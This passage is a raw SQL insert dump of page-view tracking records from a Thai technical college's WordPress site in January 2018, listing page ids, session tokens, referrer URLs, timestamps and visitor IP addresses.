(23, '626', '626', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:45:11', '192.168.10.71'),
(24, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:46:19', '192.168.10.71'),
(25, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:46:19', '192.168.10.71'),
(26, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:46:19', '192.168.10.71'),
(27, '626', '626', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:46:19', '192.168.10.71'),
(28, '287', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:47:38', '192.168.10.71'),
(29, '287', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:47:38', '192.168.10.71'),
(30, '287', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:47:38', '192.168.10.71'),
(31, '287', '626', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:47:38', '192.168.10.71'),
(32, '626', '626', 1, 0, 'tNsgIiTqlHd1JFb6OINvK6ypVkiTlt2ShG2', 0, 'vu4kapnksl6haifhnha0phl7j7', 'Direct Traffic', '2018-01-15 18:48:00', '192.0.88.95'),
(33, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:08', '192.168.10.71'),
(34, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:08', '192.168.10.71'),
(35, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:08', '192.168.10.71'),
(36, '626', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:08', '192.168.10.71'),
(37, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:56', '192.168.10.71'),
(38, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:56', '192.168.10.71'),
(39, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:56', '192.168.10.71'),
(40, '626', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:56', '192.168.10.71'),
(41, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:57', '192.168.10.71'),
(42, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:57', '192.168.10.71'),
(43, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:57', '192.168.10.71'),
(44, '626', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:48:57', '192.168.10.71'),
(45, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:03', '192.168.10.71'),
(46, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:03', '192.168.10.71'),
(47, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:03', '192.168.10.71'),
(48, '626', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:03', '192.168.10.71'),
(49, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:04', '192.168.10.71'),
(50, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:04', '192.168.10.71'),
(51, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:04', '192.168.10.71'),
(52, '626', '626', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:04', '192.168.10.71'),
(53, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:06', '192.168.10.71'),
(54, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:06', '192.168.10.71'),
(55, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:06', '192.168.10.71'),
(56, '626', '626', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:06', '192.168.10.71'),
(57, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:06', '192.168.10.71'),
(58, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:06', '192.168.10.71'),
(59, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:06', '192.168.10.71'),
(60, '626', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:06', '192.168.10.71'),
(61, '626', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:23', '192.168.10.71'),
(62, '626', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:23', '192.168.10.71'),
(63, '626', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:23', '192.168.10.71'),
(64, '626', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:49:23', '192.168.10.71'),
(65, '160', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:52:55', '192.168.10.71'),
(66, '160', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:52:55', '192.168.10.71'),
(67, '160', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:52:55', '192.168.10.71'),
(68, '160', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 18:52:55', '192.168.10.71'),
(69, '160', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:15:50', '192.168.10.71'),
(70, '160', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:15:50', '192.168.10.71'),
(71, '160', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:15:50', '192.168.10.71'),
(72, '160', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:15:50', '192.168.10.71'),
(73, '160', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:09', '192.168.10.71'),
(74, '160', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:09', '192.168.10.71'),
(75, '160', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:09', '192.168.10.71'),
(76, '160', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:09', '192.168.10.71'),
(77, '287', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:23', '192.168.10.71'),
(78, '287', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:23', '192.168.10.71'),
(79, '287', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:23', '192.168.10.71'),
(80, '287', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:23', '192.168.10.71'),
(81, '160', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:26', '192.168.10.71'),
(82, '160', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:26', '192.168.10.71'),
(83, '160', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:26', '192.168.10.71'),
(84, '160', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:16:26', '192.168.10.71'),
(85, '160', '626', 1, 0, '0rmKICCoSIO4ADTyfzfMhaaqm0lEvMyqgqq', 0, 'rq7ksdp318u3angpf20f55ajs2', 'https://www.google.co.th/', '2018-01-15 19:16:34', '110.168.150.49'),
(86, '160', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:17:13', '192.168.10.71'),
(87, '160', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:17:13', '192.168.10.71'),
(88, '160', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:17:13', '192.168.10.71'),
(89, '160', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:17:13', '192.168.10.71'),
(90, '160', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:17:39', '192.168.10.71'),
(91, '160', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:17:39', '192.168.10.71'),
(92, '160', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:17:39', '192.168.10.71'),
(93, '160', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:17:39', '192.168.10.71'),
(94, '287', '626', 1, 0, '0rmKICCoSIO4ADTyfzfMhaaqm0lEvMyqgqq', 0, 'rq7ksdp318u3angpf20f55ajs2', 'https://www.google.co.th/', '2018-01-15 19:17:53', '110.168.150.49'),
(95, '160', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:18:02', '192.168.10.71'),
(96, '160', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:18:02', '192.168.10.71'),
(97, '160', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:18:02', '192.168.10.71'),
(98, '160', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:18:02', '192.168.10.71'),
(99, '160', '622', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:18:34', '192.168.10.71'),
(100, '160', '624', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:18:34', '192.168.10.71'),
(101, '160', '625', 0, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:18:34', '192.168.10.71'),
(102, '160', '626', 1, 0, 'yXT1LO7dVEroxu0G55UCSNTtp085Obnc4gs', 0, 'o0f6ac53n2barkpij8bpav8m87', 'http://www.technicrayong.ac.th/category/events/', '2018-01-15 19:18:34', '192.168.10.71'),
(103, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:52:21', '192.168.10.71'),
(104, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:52:21', '192.168.10.71'),
(105, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:52:21', '192.168.10.71'),
(106, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:52:21', '192.168.10.71'),
(107, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:52:21', '192.168.10.71'),
(108, '633', '633', 0, 0, 'eLZR33gxhcBOSudL3o0rpWuHAVtzOL6Td29', 0, 'ctodhkuiuabdv1sdshpbg9gbt4', 'Direct Traffic', '2018-01-16 15:52:45', '192.0.99.66'),
(109, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:03', '192.168.10.71'),
(110, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:03', '192.168.10.71'),
(111, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:03', '192.168.10.71'),
(112, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:03', '192.168.10.71'),
(113, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:03', '192.168.10.71'),
(114, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:36', '192.168.10.71'),
(115, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:36', '192.168.10.71'),
(116, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:36', '192.168.10.71'),
(117, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:36', '192.168.10.71'),
(118, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:55:36', '192.168.10.71'),
(119, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:30', '192.168.10.71'),
(120, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:30', '192.168.10.71'),
(121, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:30', '192.168.10.71'),
(122, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:30', '192.168.10.71'),
(123, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:30', '192.168.10.71'),
(124, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:58', '192.168.10.71'),
(125, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:58', '192.168.10.71'),
(126, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:58', '192.168.10.71'),
(127, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:58', '192.168.10.71'),
(128, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:56:58', '192.168.10.71'),
(129, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:16', '192.168.10.71'),
(130, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:16', '192.168.10.71'),
(131, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:16', '192.168.10.71'),
(132, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:16', '192.168.10.71'),
(133, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:16', '192.168.10.71'),
(134, '633', '622', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:42', '192.168.10.71'),
(135, '633', '624', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:42', '192.168.10.71'),
(136, '633', '625', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:42', '192.168.10.71'),
(137, '633', '626', 1, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:42', '192.168.10.71'),
(138, '633', '633', 0, 0, 'V2JDTU57V29KZVBy0dJqSAQmqvLUEd1y4UT', 0, 'tusno1hs285ibu6664lpgfoje7', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=633&action=edit&inbound-editor=false', '2018-01-16 15:59:42', '192.168.10.71'),
